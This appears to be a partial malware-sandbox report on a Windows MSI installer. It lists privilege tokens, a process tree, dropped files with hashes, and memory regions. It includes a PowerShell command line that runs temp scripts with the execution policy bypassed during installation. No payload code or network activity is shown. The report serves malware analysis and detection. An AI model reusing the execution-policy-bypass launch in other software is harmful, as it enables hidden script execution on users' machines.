Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 910E81B7D4DCC38CF4D0C1D98BC2A315

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss2436.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi2433.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr2434.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr2435.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

Network

N/A

Files

C:\Windows\Installer\MSI207C.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSI22EF.tmp

MD5 fb4665320c9da54598321c59cc5ed623
SHA1 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512 b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

memory/2556-22-0x00000000028D0000-0x0000000002910000-memory.dmp

memory/2556-24-0x00000000028D0000-0x0000000002910000-memory.dmp

memory/2556-23-0x0000000073410000-0x00000000739BB000-memory.dmp

memory/2556-21-0x0000000073410000-0x00000000739BB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss2436.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

C:\Users\Admin\AppData\Local\Temp\scr2434.ps1

MD5 753240f3d0c58563dcba1244db69b0d7
SHA1 4a0f248fccc2431ece50f717cbf80f6681504932
SHA256 e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a
SHA512 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9

memory/2556-28-0x0000000073410000-0x00000000739BB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msi2433.txt

MD5 0fb609a6d2027ec24eb33cf64bd95b20
SHA1 ec07f4535b17f362ba12924d62fd952a93e61547
SHA256 b9227e3366d64bcf11da5683b8fc1d5e10afa40b66434ddb7b279f835a9401c9
SHA512 cc522dfac8b6958b97cc495af936b7c716199d1b257f3aa4f9eaf08a78f003c5a4ea8b90ab506db46ea751988d51b0f99bea9fdbcc46037b4c0997ccb86557b3

C:\Config.Msi\f762003.rbs

MD5 109461420f8b6e0d54278c7a6d36ac51
SHA1 c16aebe7d600f17912d4c651affaefd7723a5a79
SHA256 425befa83736b0cd8d21414a385ce18e93e66ba7ef3ad0d1eafb91206be1dcb7
SHA512 c3b6e0247159fbc34a3bfd0c61921e406cccf9f71e46f354e4bbf7d0bee2014749d90d17eb53034650242564ead5a94c6e088183500a109643d742ff4b3c81e1

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll

MD5 f74e6b15bbb4d3a8decb9fe17175d056
SHA1 20a67c7d020bce3adcbd34cb0044771ae0bcb2ba
SHA256 50235ec9328d759d9adceb1224999bcf5d602594b2c6260c4f793b84c533e6d3
SHA512 5c896a916537cbf6e4f6c995a240b3e651356e5a5fc549058cc60892c5905e64a3fd78cf0998149ca88f474f9ce78c94ea398bd245735a1b242f497adb44bbf4

C:\Windows\Installer\f761fff.msi

MD5 86a68878633d570e195609fe33640561
SHA1 5a5355a80750693493c4ff9d4184d3234ad62b73
SHA256 7a5d8ef1b6de2d300a6a3118426562e881577c85ab2d919f0337e4de0e9aaa92
SHA512 502f996aff0273aecd4256bd25b3bcd2187a2b44c1b26c0b64a622ae2d788328d8f8e9bbd8fa9119a0edb282d1737f8f502ecf69484a70b14fd287442630c1a9